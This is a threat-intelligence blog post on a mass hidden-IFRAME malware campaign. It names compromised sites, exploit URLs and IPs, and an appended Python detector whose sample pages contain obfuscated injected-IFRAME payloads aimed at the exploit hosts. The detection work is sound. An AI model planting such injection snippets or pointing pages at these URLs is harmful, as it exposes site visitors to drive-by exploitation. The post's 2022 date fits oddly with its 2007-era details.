Another Massive Embedded Malware Attack

June 14, 2022
Compared to the previous massive embedded malware attack in Italy that I assessed in June 2007, which relied primarily on a shared hosting provider having been compromised, this one is more interesting to follow because the affected domains have nothing to do with each other; in fact, some of them are suspected of having been generated for blackhat SEO purposes in combination with the embedded malware, while the rest are legitimate sites. Moreover, the campaign is currently in a cover-up stage, yet the sites are still serving the IFRAME shown in the attached screenshot. The currently affected sites, over 90% of which still carry the IFRAME, are:

syncopatedvideo.com
ja-bob.com
idledrawings.com
biblequizzer.net
johnnydam.com
gonaus.com
caribbeanjamz.net
campbellscollision.com
instopiainsurance.com
electronicesthetics.com
blackopalproductions.com
loadway.com
mtwashingtonkennelclub.com
shoveltown.com
simplabase.com
ajrivers.com
jacquelinesdayspa.com
epidemianet.com
aabosa.net
bisign.com
orangevaleson.com
blackmanassociates.com
jumarktrade.com
queerduck.icebox.com

The main campaign IFRAME URL is megazo.org/trans.htm, which serves TR/Crypt.XPACK.Gen and uses its own nameservers, ns1.megazo.org (203.117.111.102) and ns2.megazo.org (203.117.111.103), the latter also hosting 13fr.info, 1sense.info and 1speed.info. Deobfuscating the page leads to 1spice.info/t/ (203.121.79.164), from where the visitor is redirected to 203.121.79.164/cgi-bin/new/in.cgi?p=user4; both URLs attempt to exploit the MDAC ActiveX code execution vulnerability (CVE-2006-0003). Another exploit URL is active at the same IP, 203.121.79.164/web/index.php, which is IcePack in action.
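
As an added example (not code from the post or from its author), the following Python script does what the analysis above describes by hand: it parses a page, decodes the document.write(unescape(...)) and String.fromCharCode(...) obfuscations that droppers of this era commonly used, and reports any IFRAME pointing at the campaign's hosts (megazo.org, 1spice.info, 203.121.79.164) together with whether the frame is hidden. The post does not say which obfuscation this campaign used, so the decoders and the sample pages are assumptions constructed for illustration; the real affected sites are not fetched.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the post: the IFRAME host, the deobfuscated landing
# host and the IP serving the exploit pages.
CAMPAIGN_HOSTS = {"megazo.org", "1spice.info", "203.121.79.164"}

class IframeCollector(HTMLParser):
    """Collect every <iframe> attribute set and the text of every <script> body."""
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._buf = []
    def handle_data(self, data):
        if self._buf is not None:          # inside <script>...</script>
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

def decode_js_escapes(text):
    """Undo the encodings a document.write(unescape(...)) dropper usually relies
    on: String.fromCharCode(...) lists, %uXXXX and %XX escapes. Assumption: the
    post does not say which obfuscation this campaign used."""
    def from_char_code(m):
        return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))
    text = re.sub(r"String\.fromCharCode\(([^)]*)\)", from_char_code, text)
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)

def is_hidden(attrs):
    """Zero/one-pixel frames or display:none are the usual drive-by giveaway."""
    tiny = {"0", "1", "0px", "1px"}
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width", "").strip() in tiny or attrs.get("height", "").strip() in tiny
            or "display:none" in style or "visibility:hidden" in style)

def find_campaign_iframes(html):
    """Return [(src, hidden)] for each iframe, in the raw markup or inside a
    decoded script body, whose host is one of the campaign indicators."""
    top = IframeCollector()
    top.feed(html)
    candidates = list(top.iframes)
    for body in top.scripts:
        inner = IframeCollector()
        inner.feed(decode_js_escapes(body))   # decoded payload parsed as markup
        candidates.extend(inner.iframes)
    hits = []
    for attrs in candidates:
        src = attrs.get("src", "").strip()
        host = urlparse(src if "://" in src else "http://" + src).hostname or ""
        if src and host in CAMPAIGN_HOSTS:
            hits.append((src, is_hidden(attrs)))
    return hits

def scan(pages):
    """Map hostname -> campaign iframes found; hosts with none are left out."""
    return {h: hits for h, html in pages.items() if (hits := find_campaign_iframes(html))}

# Constructed sample pages standing in for the affected sites; none of this
# was captured from the real domains.
_CHARCODE = ",".join(str(ord(c)) for c in
    '<iframe src="http://203.121.79.164/cgi-bin/new/in.cgi?p=user4" style="display:none"></iframe>')
SAMPLE_PAGES = {
    "plain-inject.example":
        '<html><body><p>Welcome</p><iframe src="http://megazo.org/trans.htm" '
        'width="0" height="0"></iframe></body></html>',
    "obfuscated-inject.example":
        '<html><body><script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F'
        '1spice.info%2Ft%2F%22%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fiframe%3E"))'
        '</script></body></html>',
    "charcode-inject.example":
        '<html><body><script>document.write(String.fromCharCode(' + _CHARCODE
        + '))</script></body></html>',
    "clean.example":
        '<html><body><iframe src="http://www.example.com/widget" width="300" '
        'height="200"></iframe></body></html>',
}

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_PAGES).items():
        for src, hidden in hits:
            print(f"{host}: {src} ({'hidden' if hidden else 'visible'})")
```

Script bodies are decoded and re-parsed as markup rather than matched with a regex on the raw page, because the injected IFRAME in the obfuscated cases never appears literally in the HTML; a hidden 0x0 or 1x1 frame pointing at an unrelated host is the signal to chase, and a legitimately sized frame to an unrelated host is deliberately left alone.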

About Dancho Danchev

Independent Security Consultancy, Threat Intelligence Analysis (OSINT/Cyber Counter Intelligence) and Competitive Intelligence research on demand. Insightful, unbiased, and client-tailored assessments, neatly communicated in the form of interactive reports - because anticipating the emerging threatscape is what shapes the big picture at the end of the day. Approach me at dancho.danchev@hush.com
